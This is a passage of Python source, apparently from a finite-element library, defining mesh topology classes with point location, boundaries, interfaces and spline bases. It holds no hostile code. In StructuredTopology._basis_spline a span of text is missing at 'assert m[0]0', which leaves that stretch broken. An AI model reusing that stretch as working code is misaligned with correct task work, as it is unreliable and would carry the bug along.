newboundary=name)\n\n def subset(self, topo, newboundary=None, strict=False):\n 'intersection'\n refs = [ref.empty for ref in self.references]\n for ref, trans in zip(topo.references, topo.transforms):\n try:\n ielem = self.transforms.index(trans)\n except ValueError:\n assert not strict, 'elements do not form a strict subset'\n else:\n subref = self.references[ielem] & ref\n if strict:\n assert subref == ref, 'elements do not form a strict subset'\n refs[ielem] = subref\n if not any(refs):\n return EmptyTopology(self.ndims)\n return SubsetTopology(self, refs, newboundary)\n\n def withgroups(self, vgroups={}, bgroups={}, igroups={}, pgroups={}):\n return WithGroupsTopology(self, vgroups, bgroups, igroups, pgroups) if vgroups or bgroups or igroups or pgroups else self\n\n withsubdomain = lambda self, **kwargs: self.withgroups(vgroups=kwargs)\n withboundary = lambda self, **kwargs: self.withgroups(bgroups=kwargs)\n withinterfaces = lambda self, **kwargs: self.withgroups(igroups=kwargs)\n withpoints = lambda self, **kwargs: self.withgroups(pgroups=kwargs)\n\n @log.withcontext\n def volume(self, geometry, ischeme='gauss', degree=1, *, arguments=None):\n return self.integrate(function.J(geometry, self.ndims), ischeme=ischeme, degree=degree, arguments=arguments)\n\n @log.withcontext\n def check_boundary(self, geometry, elemwise=False, ischeme='gauss', degree=1, tol=1e-15, print=print, *, arguments=None):\n if elemwise:\n for ref in self.references:\n ref.check_edges(tol=tol, print=print)\n volume = self.volume(geometry, ischeme=ischeme, degree=degree, arguments=arguments)\n J = function.J(geometry, self.ndims-1)\n zeros, volumes = self.boundary.integrate([geometry.normal()*J, geometry*geometry.normal()*J], ischeme=ischeme, degree=degree, arguments=arguments)\n if numpy.greater(abs(zeros), tol).any():\n print('divergence check failed: {} != 0'.format(zeros))\n if numpy.greater(abs(volumes - volume), tol).any():\n print('divergence check failed: {} != {}'.format(volumes, volume))\n\n def indicator(self, subtopo):\n '''Create an indicator function for a subtopology.'''\n\n if isinstance(subtopo, str):\n subtopo = self[subtopo]\n values = numpy.zeros([len(self)], dtype=int)\n values[numpy.fromiter(map(self.transforms.index, subtopo.transforms), dtype=int)] = 1\n return function.get(values, 0, self.f_index)\n\n def select(self, indicator, ischeme='bezier2', **kwargs):\n sample = self.sample(*element.parse_legacy_ischeme(ischeme))\n isactive = numpy.greater(sample.eval(indicator, **kwargs), 0)\n selected = types.frozenarray(tuple(i for i, index in enumerate(sample.index) if isactive[index].any()), dtype=int)\n return self[selected]\n\n @log.withcontext\n def locate(self, geom, coords, *, tol=0, eps=0, maxiter=0, arguments=None, weights=None, maxdist=None, ischeme=None, scale=None):\n '''Create a sample based on physical coordinates.\n\n In a finite element application, functions are commonly evaluated in points\n that are defined on the topology. The reverse, finding a point on the\n topology based on a function value, is often a nonlinear process and as\n such involves Newton iterations. The ``locate`` function facilitates this\n search process and produces a :class:`nutils.sample.Sample` instance that\n can be used for the subsequent evaluation of any function in the given\n physical points.\n\n Example:\n\n >>> from . import mesh\n >>> domain, geom = mesh.unitsquare(nelems=3, etype='mixed')\n >>> sample = domain.locate(geom, [[.9, .4]], tol=1e-12)\n >>> sample.eval(geom).tolist()\n [[0.9, 0.4]]\n\n Locate requires a geometry function, an array of coordinates, and at least\n one of ``tol`` and ``eps`` to set the tolerance in physical of element\n space, respectively; if both are specified the least restrictive takes\n precedence.\n\n Args\n ----\n geom : 1-dimensional :class:`nutils.function.Array`\n Geometry function of length ``ndims``.\n coords : 2-dimensional :class:`float` array\n Array of coordinates with ``ndims`` columns.\n tol : :class:`float` (default: 0)\n Maximum allowed distance in physical coordinates between target and\n located point.\n eps : :class:`float` (default: 0)\n Maximum allowed distance in element coordinates between target and\n located point.\n maxiter : :class:`int` (default: 0)\n Maximum allowed number of Newton iterations, or 0 for unlimited.\n arguments : :class:`dict` (default: None)\n Arguments for function evaluation.\n weights : :class:`float` array (default: None)\n Optional weights, in case ``coords`` are quadrature points, making the\n resulting sample suitable for integration.\n maxdist : :class:`float` (default: None)\n Speed up failure by setting a physical distance between point and\n element centroid above which the element is rejected immediately. If\n all points are expected to be located then this can safely be left\n unspecified.\n\n Returns\n -------\n located : :class:`nutils.sample.Sample`\n '''\n\n if ischeme is not None:\n warnings.deprecation('the ischeme argument is deprecated and will be removed in future')\n if scale is not None:\n warnings.deprecation('the scale argument is deprecated and will be removed in future')\n if max(tol, eps) <= 0:\n raise ValueError('locate requires either tol or eps to be strictly positive')\n coords = numpy.asarray(coords, dtype=float)\n if geom.ndim == 0:\n geom = geom[_]\n coords = coords[...,_]\n if not geom.shape == coords.shape[1:] == (self.ndims,):\n raise ValueError('invalid geometry or point shape for {}D topology'.format(self.ndims))\n centroids = self.sample('_centroid', None).eval(geom)\n assert len(centroids) == len(self)\n ielems = parallel.shempty(len(coords), dtype=int)\n points = parallel.shempty((len(coords),len(geom)), dtype=float)\n _ielem = evaluable.Argument('_locate_ielem', shape=(), dtype=int)\n _point = evaluable.Argument('_locate_point', shape=(self.ndims,))\n lower_args = dict(\n transform_chains = (\n evaluable.TransformChainFromSequence(self.transforms, _ielem),\n evaluable.TransformChainFromSequence(self.opposites, _ielem)),\n coordinates = (_point, _point))\n xJ = evaluable.Tuple((geom.lower(**lower_args), function.localgradient(geom, self.ndims).lower(**lower_args))).simplified\n arguments = dict(arguments or ())\n with parallel.ctxrange('locating', len(coords)) as ipoints:\n for ipoint in ipoints:\n xt = coords[ipoint] # target\n dist = numpy.linalg.norm(centroids - xt, axis=1)\n for ielem in numpy.argsort(dist) if maxdist is None \\\n else sorted((dist < maxdist).nonzero()[0], key=dist.__getitem__):\n ref = self.references[ielem]\n arguments['_locate_ielem'] = ielem\n arguments['_locate_point'] = p = numpy.array(ref.centroid)\n ex = ep = numpy.inf\n iiter = 0\n while ex > tol and ep > eps: # newton loop\n if iiter > maxiter > 0:\n break # maximum number of iterations reached\n iiter += 1\n xp, Jp = xJ.eval(**arguments)\n dx = xt - xp\n ex0 = ex\n ex = numpy.linalg.norm(dx)\n if ex >= ex0:\n break # newton is diverging\n try:\n dp = numpy.linalg.solve(Jp, dx)\n except numpy.linalg.LinAlgError:\n break # jacobian is singular\n ep = numpy.linalg.norm(dp)\n p += dp # NOTE: modifies arguments['_locate_point'] in place\n else:\n if ref.inside(p, max(eps, ep)):\n ielems[ipoint] = ielem\n points[ipoint] = p\n break\n else:\n raise LocateError('failed to locate point: {}'.format(xt))\n return self._sample(ielems, points, weights)\n\n def _sample(self, ielems, coords, weights=None):\n uielems = numpy.unique(ielems)\n points_ = []\n index = []\n for ielem in uielems:\n w, = numpy.equal(ielems, ielem).nonzero()\n points_.append(points.CoordsPoints(coords[w]) if weights is None\n else points.CoordsWeightsPoints(coords[w], weights[w]))\n index.append(w)\n transforms = self.transforms[uielems],\n if len(self.transforms) == 0 or self.opposites != self.transforms:\n transforms += self.opposites[uielems],\n points_ = PointsSequence.from_iter(points_, self.ndims)\n return Sample.new(transforms, points_, index)\n\n def revolved(self, geom):\n '''Create revolved topology, geometry.'''\n\n assert geom.ndim == 1\n revdomain = self * RevolutionTopology()\n angle = function.RevolutionAngle()\n geom, angle = function.bifurcate(geom, angle)\n revgeom = function.concatenate([geom[0] * function.trignormal(angle), geom[1:]])\n simplify = _identity\n return revdomain, revgeom, simplify\n\n def extruded(self, geom, nelems, periodic=False, bnames=('front','back')):\n assert geom.ndim == 1\n root = transform.Identifier(1, 'extrude')\n extopo = self * StructuredLine(root, i=0, j=nelems, periodic=periodic, bnames=bnames)\n exgeom = function.concatenate(function.bifurcate(geom, function.rootcoords(1)))\n return extopo, exgeom\n\n @property\n @log.withcontext\n def boundary(self):\n '''\n :class:`Topology`:\n The boundary of this topology.\n '''\n\n references = []\n selection = []\n iglobaledgeiter = itertools.count()\n refs_touched = False\n for ielem, (ioppelems, elemref, elemtrans) in enumerate(zip(self.connectivity, self.references, self.transforms)):\n for (edgetrans, edgeref), ioppelem, iglobaledge in zip(elemref.edges, ioppelems, iglobaledgeiter):\n if edgeref:\n if ioppelem == -1:\n references.append(edgeref)\n selection.append(iglobaledge)\n else:\n ioppedge = self.connectivity[ioppelem].index(ielem)\n ref = edgeref - self.references[ioppelem].edge_refs[ioppedge]\n if ref:\n references.append(ref)\n selection.append(iglobaledge)\n refs_touched = True\n selection = types.frozenarray(selection, int)\n if refs_touched:\n references = References.from_iter(references, self.ndims-1)\n else:\n references = self.references.edges[selection]\n transforms = self.transforms.edges(self.references)[selection]\n return Topology(references, transforms, transforms)\n\n @property\n @log.withcontext\n def interfaces(self):\n references = []\n selection = []\n oppselection = []\n iglobaledgeiter = itertools.count()\n refs_touched = False\n edges = self.transforms.edges(self.references)\n if self.references.isuniform:\n _nedges = self.references[0].nedges\n offset = lambda ielem: ielem * _nedges\n else:\n offset = numpy.cumsum([0]+list(ref.nedges for ref in self.references)).__getitem__\n for ielem, (ioppelems, elemref, elemtrans) in enumerate(zip(self.connectivity, self.references, self.transforms)):\n for (edgetrans, edgeref), ioppelem, iglobaledge in zip(elemref.edges, ioppelems, iglobaledgeiter):\n if edgeref and -1 < ioppelem < ielem:\n ioppedge = self.connectivity[ioppelem].index(ielem)\n oppedgetrans, oppedgeref = self.references[ioppelem].edges[ioppedge]\n ref = oppedgeref and edgeref & oppedgeref\n if ref:\n references.append(ref)\n selection.append(iglobaledge)\n oppselection.append(offset(ioppelem)+ioppedge)\n if ref != edgeref:\n refs_touched = True\n selection = types.frozenarray(selection, int)\n oppselection = types.frozenarray(oppselection, int)\n if refs_touched:\n references = References.from_iter(references, self.ndims-1)\n else:\n references = self.references.edges[selection]\n return Topology(references, edges[selection], edges[oppselection])\n\n def basis_spline(self, degree):\n assert degree == 1\n return self.basis('std', degree)\n\n def basis_discont(self, degree):\n 'discontinuous shape functions'\n\n assert numeric.isint(degree) and degree >= 0\n if self.references.isuniform:\n coeffs = [self.references[0].get_poly_coeffs('bernstein', degree=degree)]*len(self.references)\n else:\n coeffs = [ref.get_poly_coeffs('bernstein', degree=degree) for ref in self.references]\n return function.DiscontBasis(coeffs, self.f_index, self.f_coords)\n\n def _basis_c0_structured(self, name, degree):\n 'C^0-continuous shape functions with lagrange stucture'\n\n assert numeric.isint(degree) and degree >= 0\n\n if degree == 0:\n raise ValueError('Cannot build a C^0-continuous basis of degree 0. Use basis \\'discont\\' instead.')\n\n coeffs = [ref.get_poly_coeffs(name, degree=degree) for ref in self.references]\n offsets = numpy.cumsum([0] + [len(c) for c in coeffs])\n dofmap = numpy.repeat(-1, offsets[-1])\n for ielem, ioppelems in enumerate(self.connectivity):\n for iedge, jelem in enumerate(ioppelems): # loop over element neighbors and merge dofs\n if jelem < ielem:\n continue # either there is no neighbor along iedge or situation will be inspected from the other side\n jedge = self.connectivity[jelem].index(ielem)\n idofs = offsets[ielem] + self.references[ielem].get_edge_dofs(degree, iedge)\n jdofs = offsets[jelem] + self.references[jelem].get_edge_dofs(degree, jedge)\n for idof, jdof in zip(idofs, jdofs):\n while dofmap[idof] != -1:\n idof = dofmap[idof]\n while dofmap[jdof] != -1:\n jdof = dofmap[jdof]\n if idof != jdof:\n dofmap[max(idof, jdof)] = min(idof, jdof) # create left-looking pointer\n # assign dof numbers left-to-right\n ndofs = 0\n for i, n in enumerate(dofmap):\n if n == -1:\n dofmap[i] = ndofs\n ndofs += 1\n else:\n dofmap[i] = dofmap[n]\n\n elem_slices = map(slice, offsets[:-1], offsets[1:])\n dofs = tuple(types.frozenarray(dofmap[s]) for s in elem_slices)\n return function.PlainBasis(coeffs, dofs, ndofs, self.f_index, self.f_coords)\n\n def basis_lagrange(self, degree):\n 'lagrange shape functions'\n return self._basis_c0_structured('lagrange', degree)\n\n def basis_bernstein(self, degree):\n 'bernstein shape functions'\n return self._basis_c0_structured('bernstein', degree)\n\n basis_std = basis_bernstein\n\nstricttopology = types.strict[Topology]\n\nclass LocateError(Exception):\n pass\n\nclass WithGroupsTopology(Topology):\n 'item topology'\n\n __slots__ = 'basetopo', 'vgroups', 'bgroups', 'igroups', 'pgroups'\n __cache__ = 'refined',\n\n @types.apply_annotations\n def __init__(self, basetopo:stricttopology, vgroups:types.frozendict={}, bgroups:types.frozendict={}, igroups:types.frozendict={}, pgroups:types.frozendict={}):\n assert vgroups or bgroups or igroups or pgroups\n self.basetopo = basetopo\n self.vgroups = vgroups\n self.bgroups = bgroups\n self.igroups = igroups\n self.pgroups = pgroups\n super().__init__(basetopo.references, basetopo.transforms, basetopo.opposites)\n assert all(topo is Ellipsis or isinstance(topo, str) or isinstance(topo, Topology) and topo.ndims == basetopo.ndims for topo in self.vgroups.values())\n\n def __len__(self):\n return len(self.basetopo)\n\n def getitem(self, item):\n if isinstance(item, str) and item in self.vgroups:\n itemtopo = self.vgroups[item]\n return itemtopo if isinstance(itemtopo, Topology) else self.basetopo[itemtopo]\n return self.basetopo.getitem(item)\n\n @property\n def border_transforms(self):\n return self.basetopo.border_transforms\n\n @property\n def connectivity(self):\n return self.basetopo.connectivity\n\n @property\n def boundary(self):\n return self.basetopo.boundary.withgroups(self.bgroups)\n\n @property\n def interfaces(self):\n baseitopo = self.basetopo.interfaces\n igroups = self.igroups.copy()\n for name, topo in self.igroups.items():\n if isinstance(topo, Topology):\n # last minute orientation fix\n s = []\n for transs in zip(topo.transforms, topo.opposites):\n for trans in transs:\n try:\n s.append(baseitopo.transforms.index(trans))\n break\n except ValueError:\n continue\n else:\n raise ValueError('group is not a subset of topology')\n s = types.frozenarray(tuple(sorted(s)), dtype=int)\n igroups[name] = Topology(baseitopo.references[s], baseitopo.transforms[s], baseitopo.opposites[s])\n return baseitopo.withgroups(igroups)\n\n @property\n def points(self):\n ptopos = []\n pnames = []\n topo = self\n while isinstance(topo, WithGroupsTopology):\n for pname, ptopo in topo.pgroups.items():\n if pname not in pnames:\n pnames.append(pname)\n ptopos.append(ptopo)\n topo = topo.basetopo\n return UnionTopology(ptopos, pnames)\n\n def basis(self, name, *args, **kwargs):\n return self.basetopo.basis(name, *args, **kwargs)\n\n @property\n def refined(self):\n groups = [{name: topo.refined if isinstance(topo,Topology) else topo for name, topo in groups.items()} for groups in (self.vgroups,self.bgroups,self.igroups,self.pgroups)]\n return self.basetopo.refined.withgroups(*groups)\n\nclass OppositeTopology(Topology):\n 'opposite topology'\n\n __slots__ = 'basetopo',\n\n def __init__(self, basetopo):\n self.basetopo = basetopo\n super().__init__(basetopo.references, basetopo.opposites, basetopo.transforms)\n\n def getitem(self, item):\n return ~(self.basetopo.getitem(item))\n\n def __len__(self):\n return len(self.basetopo)\n\n def __invert__(self):\n return self.basetopo\n\nclass EmptyTopology(Topology):\n 'empty topology'\n\n __slots__ = ()\n\n @types.apply_annotations\n def __init__(self, ndims:types.strictint):\n super().__init__(References.empty(ndims), transformseq.EmptyTransforms(ndims), transformseq.EmptyTransforms(ndims))\n\n def __or__(self, other):\n assert self.ndims == other.ndims\n return other\n\n def __rsub__(self, other):\n return other\n\nclass Point(Topology):\n 'point'\n\n __slots__ = ()\n\n @types.aspreprocessor\n @types.apply_annotations\n def _preprocess_init(self, trans:transform.stricttransform, opposite:transform.stricttransform=None):\n return (self, trans, trans if opposite is None else opposite), {}\n\n @_preprocess_init\n def __init__(self, trans, opposite):\n assert trans[-1].fromdims == 0\n references = References.uniform(element.getsimplex(0), 1)\n transforms = transformseq.PlainTransforms((trans,), 0)\n opposites = transforms if opposite is None else transformseq.PlainTransforms((opposite,), 0)\n super().__init__(references, transforms, opposites)\n\ndef StructuredLine(root:transform.stricttransformitem, i:types.strictint, j:types.strictint, periodic:bool=False, bnames:types.tuple[types.strictstr]=None):\n if bnames is None:\n bnames = ('_structured_line_dummy_boundary_name_',) * 2\n return StructuredTopology(root, axes=(transformseq.DimAxis(i,j,j if periodic else 0,periodic),), nrefine=0, bnames=(bnames,))\n\nclass StructuredTopology(Topology):\n 'structured topology'\n\n __slots__ = 'root', 'axes', 'nrefine', 'shape', '_bnames'\n __cache__ = 'connectivity', 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, root:transform.stricttransformitem, axes:types.tuple[types.strict[transformseq.Axis]], nrefine:types.strictint=0, bnames:types.tuple[types.tuple[types.strictstr]]=(('left', 'right'), ('bottom', 'top'), ('front', 'back'))):\n 'constructor'\n\n assert all(len(bname) == 2 for bname in bnames)\n\n self.root = root\n self.axes = axes\n self.nrefine = nrefine\n self.shape = tuple(axis.j - axis.i for axis in self.axes if axis.isdim)\n self._bnames = bnames\n\n references = References.uniform(util.product(element.getsimplex(1 if axis.isdim else 0) for axis in self.axes), len(self))\n transforms = transformseq.StructuredTransforms(self.root, self.axes, self.nrefine)\n nbounds = len(self.axes) - len(self.shape)\n if nbounds == 0:\n opposites = transforms\n else:\n axes = [axis.opposite(nbounds-1) for axis in self.axes]\n opposites = transformseq.StructuredTransforms(self.root, axes, self.nrefine)\n\n super().__init__(references, transforms, opposites)\n\n def __repr__(self):\n return '{}<{}>'.format(type(self).__qualname__, 'x'.join(str(axis.j-axis.i)+('p' if axis.isperiodic else '') for axis in self.axes if axis.isdim))\n\n def __len__(self):\n return numpy.prod(self.shape, dtype=int)\n\n def getitem(self, item):\n if not isinstance(item, tuple):\n return EmptyTopology(self.ndims)\n assert all(isinstance(it,slice) for it in item) and len(item) <= self.ndims\n if all(it == slice(None) for it in item): # shortcut\n return self\n axes = []\n idim = 0\n for axis in self.axes:\n if axis.isdim and idim < len(item):\n axis = axis.getitem(item[idim])\n idim += 1\n axes.append(axis)\n return StructuredTopology(self.root, axes, self.nrefine, bnames=self._bnames)\n\n @property\n def periodic(self):\n dimaxes = (axis for axis in self.axes if axis.isdim)\n return tuple(idim for idim, axis in enumerate(dimaxes) if axis.isdim and axis.isperiodic)\n\n @property\n def connectivity(self):\n connectivity = numpy.empty(self.shape+(self.ndims,2), dtype=int)\n connectivity[...] = -1\n ielems = numpy.arange(len(self)).reshape(self.shape)\n for idim in range(self.ndims):\n s = (slice(None),)*idim\n s1 = s + (slice(1,None),)\n s2 = s + (slice(0,-1),)\n connectivity[s2+(...,idim,0)] = ielems[s1]\n connectivity[s1+(...,idim,1)] = ielems[s2]\n if idim in self.periodic:\n connectivity[s+(-1,...,idim,0)] = ielems[s+(0,)]\n connectivity[s+(0,...,idim,1)] = ielems[s+(-1,)]\n return types.frozenarray(connectivity.reshape(len(self), self.ndims*2), copy=False)\n\n @property\n def boundary(self):\n 'boundary'\n\n nbounds = len(self.axes) - self.ndims\n btopos = [StructuredTopology(root=self.root, axes=self.axes[:idim] + (bndaxis,) + self.axes[idim+1:], nrefine=self.nrefine, bnames=self._bnames)\n for idim, axis in enumerate(self.axes)\n for bndaxis in axis.boundaries(nbounds)]\n if not btopos:\n return EmptyTopology(self.ndims-1)\n bnames = [bname for bnames, axis in zip(self._bnames, self.axes) if axis.isdim and not axis.isperiodic for bname in bnames]\n return DisjointUnionTopology(btopos, bnames)\n\n @property\n def interfaces(self):\n 'interfaces'\n\n assert self.ndims > 0, 'zero-D topology has no interfaces'\n itopos = []\n nbounds = len(self.axes) - self.ndims\n for idim, axis in enumerate(self.axes):\n if not axis.isdim:\n continue\n axes = (*self.axes[:idim], axis.intaxis(nbounds, side=True), *self.axes[idim+1:])\n oppaxes = (*self.axes[:idim], axis.intaxis(nbounds, side=False), *self.axes[idim+1:])\n itransforms = transformseq.StructuredTransforms(self.root, axes, self.nrefine)\n iopposites = transformseq.StructuredTransforms(self.root, oppaxes, self.nrefine)\n ireferences = References.uniform(util.product(element.getsimplex(1 if a.isdim else 0) for a in axes), len(itransforms))\n itopos.append(Topology(ireferences, itransforms, iopposites))\n assert len(itopos) == self.ndims\n return DisjointUnionTopology(itopos, names=['dir{}'.format(idim) for idim in range(self.ndims)])\n\n def _basis_spline(self, degree, knotvalues=None, knotmultiplicities=None, continuity=-1, periodic=None):\n 'spline with structure information'\n\n if periodic is None:\n periodic = self.periodic\n\n if numeric.isint(degree):\n degree = [degree]*self.ndims\n\n assert len(degree) == self.ndims\n\n if knotvalues is None or isinstance(knotvalues[0], (int,float)):\n knotvalues = [knotvalues] * self.ndims\n else:\n assert len(knotvalues) == self.ndims\n\n if knotmultiplicities is None or isinstance(knotmultiplicities[0], int):\n knotmultiplicities = [knotmultiplicities] * self.ndims\n else:\n assert len(knotmultiplicities) == self.ndims\n\n if not numpy.iterable(continuity):\n continuity = [continuity] * self.ndims\n else:\n assert len(continuity) == self.ndims\n\n vertex_structure = numpy.array(0)\n stdelems = []\n dofshape = []\n slices = []\n cache = {}\n for idim in range(self.ndims):\n p = degree[idim]\n n = self.shape[idim]\n isperiodic = idim in periodic\n\n c = continuity[idim]\n if c < 0:\n c += p\n assert -1 <= c < p\n\n k = knotvalues[idim]\n if k is None: #Defaults to uniform spacing\n k = numpy.arange(n+1)\n else:\n k = numpy.array(k)\n while len(k) < n+1:\n k_ = numpy.empty(len(k)*2-1)\n k_[::2] = k\n k_[1::2] = (k[:-1] + k[1:]) / 2\n k = k_\n assert len(k) == n+1, 'knot values do not match the topology size'\n\n m = knotmultiplicities[idim]\n if m is None: #Defaults to open spline without internal repetitions\n m = numpy.repeat(p-c, n+1)\n if not isperiodic:\n m[0] = m[-1] = p+1\n else:\n m = numpy.array(m)\n assert min(m) >0 and max(m) <= p+1, 'incorrect multiplicity encountered'\n while len(m) < n+1:\n m_ = numpy.empty(len(m)*2-1, dtype=int)\n m_[::2] = m\n m_[1::2] = p-c\n m = m_\n assert len(m) == n+1, 'knot multiplicity do not match the topology size'\n\n if not isperiodic:\n nd = sum(m)-p-1\n npre = p+1-m[0] #Number of knots to be appended to front\n npost = p+1-m[-1] #Number of knots to be appended to rear\n m[0] = m[-1] = p+1\n else:\n assert m[0]==m[-1], 'Periodic spline multiplicity expected'\n assert m[0]0, 'No basis functions defined. Knot vector too short.'\n\n stdelems_i = []\n slices_i = []\n offsets = numpy.cumsum(m[:-1])-p\n if isperiodic:\n offsets = offsets[p:-p]\n offset0 = offsets[0]+npre\n\n for offset in offsets:\n start = max(offset0-offset,0) #Zero unless prepending influence\n stop = p+1-max(offset-offsets[-1]+npost,0) #Zero unless appending influence\n slices_i.append(slice(offset-offset0+start,offset-offset0+stop))\n lknots = km[offset:offset+2*p] - km[offset] #Copy operation required\n if p: #Normalize for optimized caching\n lknots /= lknots[-1]\n key = (tuple(numeric.round(lknots*numpy.iinfo(numpy.int32).max)), p)\n try:\n coeffs = cache[key]\n except KeyError:\n coeffs = cache[key] = self._localsplinebasis(lknots)\n stdelems_i.append(coeffs[start:stop])\n stdelems.append(stdelems_i)\n\n numbers = numpy.arange(nd)\n if isperiodic:\n numbers = numpy.concatenate([numbers,numbers[:p]])\n vertex_structure = vertex_structure[...,_]*nd+numbers\n dofshape.append(nd)\n slices.append(slices_i)\n\n #Cache effectivity\n log.debug('Local knot vector cache effectivity: {}'.format(100*(1.-len(cache)/float(sum(self.shape)))))\n\n # deduplicate stdelems and compute tensorial products `unique` with indices `index`\n # such that unique[index[i,j]] == poly_outer_product(stdelems[0][i], stdelems[1][j])\n index = numpy.array(0)\n for stdelems_i in stdelems:\n unique_i = tuple(set(stdelems_i))\n unique = unique_i if not index.ndim \\\n else [numeric.poly_outer_product(a, b) for a in unique for b in unique_i]\n index = index[...,_] * len(unique_i) + tuple(map(unique_i.index, stdelems_i))\n\n coeffs = [unique[i] for i in index.flat]\n dofmap = [types.frozenarray(vertex_structure[S].ravel(), copy=False) for S in itertools.product(*slices)]\n return coeffs, dofmap, dofshape\n\n def basis_spline(self, degree, removedofs=None, knotvalues=None, knotmultiplicities=None, continuity=-1, periodic=None):\n 'spline basis'\n\n if removedofs is None or isinstance(removedofs[0], int):\n removedofs = [removedofs] * self.ndims\n else:\n assert len(removedofs) == self.ndims\n\n if periodic is None:\n periodic = self.periodic\n\n if numeric.isint(degree):\n degree = [degree]*self.ndims\n\n assert len(degree) == self.ndims\n\n if knotvalues is None or isinstance(knotvalues[0], (int,float)):\n knotvalues = [knotvalues] * self.ndims\n else:\n assert len(knotvalues) == self.ndims\n\n if knotmultiplicities is None or isinstance(knotmultiplicities[0], int):\n knotmultiplicities = [knotmultiplicities] * self.ndims\n else:\n assert len(knotmultiplicities) == self.ndims\n\n if not numpy.iterable(continuity):\n continuity = [continuity] * self.ndims\n else:\n assert len(continuity) == self.ndims\n\n start_dofs = []\n stop_dofs = []\n dofshape = []\n coeffs = []\n cache = {}\n for idim in range(self.ndims):\n p = degree[idim]\n n = self.shape[idim]\n\n c = continuity[idim]\n if c < 0:\n c += p\n assert -1 <= c < p\n\n k = knotvalues[idim]\n if k is None:\n k = numpy.arange(n+1) # default to uniform spacing\n else:\n k = numpy.array(k)\n while len(k) < n+1:\n k_ = numpy.empty(len(k)*2-1)\n k_[::2] = k\n k_[1::2] = (k[:-1] + k[1:]) / 2\n k = k_\n assert len(k) == n+1, 'knot values do not match the topology size'\n\n m = knotmultiplicities[idim]\n if m is None:\n m = numpy.repeat(p-c, n+1) # default to open spline without internal repetitions\n else:\n m = numpy.array(m)\n assert min(m) > 0 and max(m) <= p+1, 'incorrect multiplicity encountered'\n while len(m) < n+1:\n m_ = numpy.empty(len(m)*2-1, dtype=int)\n m_[::2] = m\n m_[1::2] = p-c\n m = m_\n assert len(m) == n+1, 'knot multiplicity do not match the topology size'\n\n if idim in periodic and not m[0] == m[n] == p+1: # if m[0] == m[n] == p+1 the spline is discontinuous at the boundary\n assert m[0] == m[n], 'periodic spline multiplicity expected'\n dk = k[n] - k[0]\n m = m[:n]\n k = k[:n]\n nd = m.sum()\n while m[n:].sum() < p - m[0] + 2:\n k = numpy.concatenate([k, k+dk])\n m = numpy.concatenate([m, m])\n dk *= 2\n km = numpy.array([ki for ki, mi in zip(k, m) for cnt in range(mi)], dtype=float)\n if p > m[0]:\n km = numpy.concatenate([km[-p+m[0]:] - dk, km])\n else:\n m[0] = m[-1] = p\n nd = m[:n].sum()+1\n km = numpy.array([ki for ki, mi in zip(k, m) for cnt in range(mi)], dtype=float)\n\n offsets = numpy.cumsum(m[:n]) - m[0]\n start_dofs.append(offsets)\n stop_dofs.append(offsets+p+1)\n dofshape.append(nd)\n\n coeffs_i = []\n for offset in offsets:\n lknots = km[offset:offset+2*p]\n key = tuple(numeric.round((lknots[1:-1]-lknots[0])/(lknots[-1]-lknots[0])*numpy.iinfo(numpy.int32).max)) if lknots.size else (), p\n try:\n local_coeffs = cache[key]\n except KeyError:\n local_coeffs = cache[key] = self._localsplinebasis(lknots)\n coeffs_i.append(local_coeffs)\n coeffs.append(tuple(coeffs_i))\n\n transforms_shape = tuple(axis.j-axis.i for axis in self.axes if axis.isdim)\n func = function.StructuredBasis(coeffs, start_dofs, stop_dofs, dofshape, transforms_shape, self.f_index, self.f_coords)\n if not any(removedofs):\n return func\n\n mask = numpy.ones((), dtype=bool)\n for idofs, ndofs in zip(removedofs, dofshape):\n mask = mask[...,_].repeat(ndofs, axis=-1)\n if idofs:\n mask[..., [numeric.normdim(ndofs,idof) for idof in idofs]] = False\n assert mask.shape == tuple(dofshape)\n return func[mask.ravel()]\n\n @staticmethod\n def _localsplinebasis(lknots):\n\n assert numeric.isarray(lknots), 'Local knot vector should be numpy array'\n p, rem = divmod(len(lknots), 2)\n assert rem == 0\n\n #Based on Algorithm A2.2 Piegl and Tiller\n N = [None]*(p+1)\n N[0] = numpy.poly1d([1.])\n\n if p > 0:\n\n assert numpy.less(lknots[:-1]-lknots[1:], numpy.spacing(1)).all(), 'Local knot vector should be non-decreasing'\n assert lknots[p]-lknots[p-1]>numpy.spacing(1), 'Element size should be positive'\n\n lknots = lknots.astype(float)\n\n xi = numpy.poly1d([lknots[p]-lknots[p-1],lknots[p-1]])\n\n left = [None]*p\n right = [None]*p\n\n for i in range(p):\n left[i] = xi - lknots[p-i-1]\n right[i] = -xi + lknots[p+i]\n saved = 0.\n for r in range(i+1):\n temp = N[r]/(lknots[p+r]-lknots[p+r-i-1])\n N[r] = saved+right[r]*temp\n saved = left[i-r]*temp\n N[i+1] = saved\n\n assert all(Ni.order==p for Ni in N)\n\n return types.frozenarray([Ni.coeffs[::-1] for Ni in N])\n\n def basis_std(self, *args, **kwargs):\n return __class__.basis_spline(self, *args, continuity=0, **kwargs)\n\n @property\n def refined(self):\n 'refine non-uniformly'\n\n axes = [axis.refined for axis in self.axes]\n return StructuredTopology(self.root, axes, self.nrefine+1, bnames=self._bnames)\n\n def locate(self, geom, coords, *, tol, eps=0, weights=None, **kwargs):\n coords = numpy.asarray(coords, dtype=float)\n if geom.ndim == 0:\n geom = geom[_]\n coords = coords[...,_]\n if not geom.shape == coords.shape[1:] == (self.ndims,):\n raise Exception('invalid geometry or point shape for {}D topology'.format(self.ndims))\n geom0, scale, index = self._asaffine(geom)\n e = self.sample('uniform', 2).eval(function.norm2(geom0 + index * scale - geom)).max() # inf-norm on non-gauss sample\n if e > tol:\n return super().locate(geom, coords, eps=eps, tol=tol, weights=weights, **kwargs)\n log.info('locate detected linear geometry: x = {} + {} xi ~{:+.1e}'.format(geom0, scale, e))\n return self._locate(geom0, scale, coords, eps=eps, weights=weights)\n\n def _asaffine(self, geom):\n index = function.rootcoords(len(self.axes))[[axis.isdim for axis in self.axes]] * 2**self.nrefine - [axis.i for axis in self.axes if axis.isdim]\n basis = function.concatenate([function.eye(self.ndims), function.diagonalize(index)], axis=0)\n A, b = map(sparse.toarray, self.sample('gauss', 2).integrate_sparse([(basis[:,_,:] * basis[_,:,:]).sum(-1), (basis * geom).sum(-1)]))\n x = numpy.linalg.solve(A, b)\n return x[:self.ndims], x[self.ndims:], index\n\n def _locate(self, geom0, scale, coords, *, eps=0, weights=None):\n mincoords, maxcoords = numpy.sort([geom0, geom0 + scale * self.shape], axis=0)\n outofbounds = numpy.less(coords, mincoords - eps) | numpy.greater(coords, maxcoords + eps)\n if outofbounds.any():\n raise LocateError('failed to locate {}/{} 